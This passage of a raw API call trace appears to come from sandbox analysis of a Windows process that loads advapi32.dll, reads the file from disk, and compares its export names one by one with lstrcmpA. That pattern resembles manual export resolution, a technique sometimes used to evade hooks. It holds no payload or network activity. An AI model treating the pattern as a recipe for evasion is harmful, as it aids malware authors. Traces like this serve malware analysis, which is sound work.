(lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeIESpace") returned 1 [0289.252] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeSpace") returned 0 [0289.252] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCheckManifest") returned 1 [0289.252] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCloseHandle") returned 1 [0289.252] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0289.252] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDeleteGroup") returned 1 [0289.252] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDeleteIEGroup") returned 1 [0289.252] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDuplicateHandle") returned 1 [0289.252] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFinalize") returned 1 [0289.252] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeDownloadList") returned 1 [0289.252] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeGroupList") returned 1 [0289.252] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeIESpace") returned 1 [0289.252] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeSpace") returned 1 [0289.252] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheGetDownloadList") returned 0 [0289.252] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCheckManifest") returned 1 [0289.252] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCloseHandle") returned 1 [0289.252] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCreateAndCommitFile") returned 1 [0289.252] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDeleteGroup") returned 1 [0289.252] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDeleteIEGroup") returned 1 [0289.252] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDuplicateHandle") returned 1 [0289.253] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFinalize") returned 1 [0289.253] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeDownloadList") returned 1 [0289.253] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeGroupList") returned 1 [0289.253] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeIESpace") returned 1 [0289.253] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeSpace") returned 1 [0289.253] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheGetDownloadList") returned 1 [0289.253] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheGetFallbackUrl") returned 0 [0289.253] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCheckManifest") returned 1 [0289.254] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCloseHandle") returned 1 [0289.255] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0289.255] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0289.255] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0289.255] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0289.255] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFinalize") returned 1 [0289.255] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0289.255] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeGroupList") returned 1 [0289.255] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeIESpace") returned 1 [0289.255] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeSpace") returned 1 [0289.255] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetDownloadList") returned 1 [0289.255] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetFallbackUrl") returned 1 [0289.255] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetGroupList") returned 0 [0289.255] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCheckManifest") returned 1 [0289.255] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCloseHandle") returned 1 [0289.255] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0289.255] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0289.255] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0289.255] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0289.255] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFinalize") returned 1 [0289.255] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0289.255] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeGroupList") returned 1 [0289.255] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeIESpace") returned 1 [0289.255] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeSpace") returned 1 [0289.255] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetDownloadList") returned 1 [0289.255] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetFallbackUrl") returned 1 [0289.255] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetGroupList") returned 1 [0289.255] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetIEGroupList") returned 0 [0289.256] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCheckManifest") returned 1 [0289.256] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCloseHandle") returned 1 [0289.256] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCreateAndCommitFile") returned 1 [0289.256] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDeleteGroup") returned 1 [0289.256] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDeleteIEGroup") returned 1 [0289.256] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDuplicateHandle") returned 1 [0289.256] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFinalize") returned 1 [0289.256] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeDownloadList") returned 1 [0289.256] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeGroupList") returned 1 [0289.256] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeIESpace") returned 1 [0289.256] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeSpace") returned 1 [0289.256] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetDownloadList") returned 1 [0289.256] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetFallbackUrl") returned 1 [0289.256] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetGroupList") returned 1 [0289.256] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetIEGroupList") returned 1 [0289.256] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetInfo") returned 0 [0289.256] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCheckManifest") returned 1 [0289.256] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCloseHandle") returned 1 [0289.256] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCreateAndCommitFile") returned 1 [0289.256] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDeleteGroup") returned 1 [0289.257] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDeleteIEGroup") returned 1 [0289.257] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDuplicateHandle") returned 1 [0289.257] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFinalize") returned 1 [0289.257] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeDownloadList") returned 1 [0289.257] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeGroupList") returned 1 [0289.257] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeIESpace") returned 1 [0289.257] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeSpace") returned 1 [0289.257] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetDownloadList") returned 1 [0289.257] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetFallbackUrl") returned 1 [0289.257] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetGroupList") returned 1 [0289.257] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetIEGroupList") returned 1 [0289.257] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetInfo") returned 1 [0289.257] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetManifestUrl") returned 0 [0289.257] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCheckManifest") returned 1 [0289.257] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCloseHandle") returned 1 [0289.257] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0289.257] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDeleteGroup") returned 1 [0289.257] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDeleteIEGroup") returned 1 [0289.257] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDuplicateHandle") returned 1 [0289.257] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFinalize") returned 1 [0289.257] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeDownloadList") returned 1 [0289.257] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeGroupList") returned 1 [0289.257] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeIESpace") returned 1 [0289.257] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeSpace") returned 1 [0289.257] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetDownloadList") returned 1 [0289.257] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetFallbackUrl") returned 1 [0289.257] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetGroupList") returned 1 [0289.257] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetIEGroupList") returned 1 [0289.258] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetInfo") returned 1 [0289.258] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetManifestUrl") returned 1 [0289.258] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheLookup") returned 0 [0289.258] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCheckManifest") returned 1 [0289.258] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCloseHandle") returned 1 [0289.258] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCreateAndCommitFile") returned 1 [0289.258] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDeleteGroup") returned 1 [0289.258] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDeleteIEGroup") returned 1 [0289.258] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDuplicateHandle") returned 1 [0289.382] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFinalize") returned 1 [0289.382] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeDownloadList") returned 1 [0289.382] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeGroupList") returned 1 [0289.382] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeIESpace") returned 1 [0289.382] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeSpace") returned 1 [0289.382] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetDownloadList") returned 1 [0289.382] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetFallbackUrl") returned 1 [0289.382] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetGroupList") returned 1 [0289.382] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetIEGroupList") returned 1 [0289.382] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetInfo") returned 1 [0289.383] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetManifestUrl") returned 1 [0289.383] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheLookup") returned 1 [0289.383] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="CommitUrlCacheEntryA") returned 0 [0289.383] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCheckManifest") returned 1 [0289.383] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCloseHandle") returned 1 [0289.383] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCreateAndCommitFile") returned 1 [0289.383] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDeleteGroup") returned 1 [0289.383] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDeleteIEGroup") returned 1 [0289.383] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDuplicateHandle") returned 1 [0289.383] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFinalize") returned 1 [0289.383] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeDownloadList") returned 1 [0289.383] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeGroupList") returned 1 [0289.383] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeIESpace") returned 1 [0289.383] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeSpace") returned 1 [0289.383] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetDownloadList") returned 1 [0289.383] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetFallbackUrl") returned 1 [0289.383] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetGroupList") returned 1 [0289.383] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetIEGroupList") returned 1 [0289.383] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetInfo") returned 1 [0289.384] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetManifestUrl") returned 1 [0289.384] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheLookup") returned 1 [0289.384] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="CommitUrlCacheEntryA") returned 1 [0289.384] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="CommitUrlCacheEntryBinaryBlob") returned 0 [0289.384] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCheckManifest") returned 1 [0289.384] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCloseHandle") returned 1 [0289.384] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCreateAndCommitFile") returned 1 [0289.384] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDeleteGroup") returned 1 [0289.384] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDeleteIEGroup") returned 1 [0289.384] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDuplicateHandle") returned 1 [0289.384] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFinalize") returned 1 [0289.384] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeDownloadList") returned 1 [0289.384] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeGroupList") returned 1 [0289.384] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeIESpace") returned 1 [0289.384] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeSpace") returned 1 [0289.384] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetDownloadList") returned 1 [0289.384] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetFallbackUrl") returned 1 [0289.384] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetGroupList") returned 1 [0289.384] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetIEGroupList") returned 1 [0289.384] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetInfo") returned 1 [0289.384] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetManifestUrl") returned 1 [0289.384] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheLookup") returned 1 [0289.384] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryA") returned 1 [0289.384] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryBinaryBlob") returned 1 [0289.385] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryW") returned 0 [0289.385] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCheckManifest") returned 1 [0289.385] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCloseHandle") returned 1 [0289.385] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCreateAndCommitFile") returned 1 [0289.385] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDeleteGroup") returned 1 [0289.385] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDeleteIEGroup") returned 1 [0289.385] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDuplicateHandle") returned 1 [0289.385] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFinalize") returned 1 [0289.385] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeDownloadList") returned 1 [0289.385] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeGroupList") returned 1 [0289.385] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeIESpace") returned 1 [0289.385] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeSpace") returned 1 [0289.385] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetDownloadList") returned 1 [0289.385] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetFallbackUrl") returned 1 [0289.385] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetGroupList") returned 1 [0289.385] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetIEGroupList") returned 1 [0289.385] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetInfo") returned 1 [0289.385] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetManifestUrl") returned 1 [0289.385] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheLookup") returned 1 [0289.405] GetProcessHeap () returned 0x5d0000 [0289.405] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4001040 | out: hHeap=0x5d0000) returned 1 [0289.522] GetProcessHeap () returned 0x5d0000 [0289.522] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x5e91a0 [0289.525] LoadLibraryA (lpLibFileName="Advapi32.dll") returned 0x7ffc5ec20000 [0289.525] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0289.525] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0289.526] GetModuleFileNameA (in: hModule=0x7ffc5ec20000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0289.527] CreateFileA (lpFileName="C:\\Windows\\system32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0289.527] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0289.527] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0289.527] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=671472) returned 1 [0289.527] GetProcessHeap () returned 0x5d0000 [0289.527] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa3ef0) returned 0x2c42010 [0289.530] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0289.530] ReadFile (in: hFile=0x140, lpBuffer=0x2c42010, nNumberOfBytesToRead=0xa3ef0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2c42010*, lpNumberOfBytesRead=0x14f5a4*=0xa3ef0, lpOverlapped=0x0) returned 1 [0289.543] CloseHandle (hObject=0x140) returned 1 [0289.543] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAFinal") returned 1 [0289.543] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAInit") returned 1 [0289.543] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAUpdate") returned 1 [0289.543] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="AbortSystemShutdownA") returned 0 [0289.544] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAFinal") returned 1 [0289.544] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAInit") returned 1 [0289.544] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAUpdate") returned 1 [0289.544] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="AbortSystemShutdownA") returned 1 [0289.544] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="AbortSystemShutdownW") returned 0 [0289.544] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAFinal") returned 1 [0289.544] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAInit") returned 1 [0289.544] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAUpdate") returned 1 [0289.544] lstrcmpA (lpString1="AccessCheck", lpString2="AbortSystemShutdownA") returned 1 [0289.544] lstrcmpA (lpString1="AccessCheck", lpString2="AbortSystemShutdownW") returned 1 [0289.544] lstrcmpA (lpString1="AccessCheck", lpString2="AccessCheck") returned 0 [0289.544] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0289.544] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0289.544] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0289.544] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0289.544] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0289.544] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0289.544] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 0 [0289.544] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0289.544] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0289.545] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0289.545] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0289.545] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0289.545] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0289.545] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0289.545] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 0 [0289.545] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAFinal") returned 1 [0289.545] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAInit") returned 1 [0289.545] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAUpdate") returned 1 [0289.545] lstrcmpA (lpString1="AccessCheckByType", lpString2="AbortSystemShutdownA") returned 1 [0289.545] lstrcmpA (lpString1="AccessCheckByType", lpString2="AbortSystemShutdownW") returned 1 [0289.545] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheck") returned 1 [0289.545] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0289.545] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0289.545] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckByType") returned 0 [0289.545] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0289.545] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0289.545] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0289.545] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0289.545] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0289.545] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0289.546] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0289.546] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0289.546] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckByType") returned 1 [0289.546] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 0 [0289.546] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0289.546] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0289.546] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0289.546] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0289.546] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0289.546] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0289.546] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0289.546] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0289.546] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByType") returned 1 [0289.546] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0289.546] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 0 [0289.546] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAFinal") returned 1 [0289.546] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAInit") returned 1 [0289.546] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAUpdate") returned 1 [0289.546] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AbortSystemShutdownA") returned 1 [0289.546] 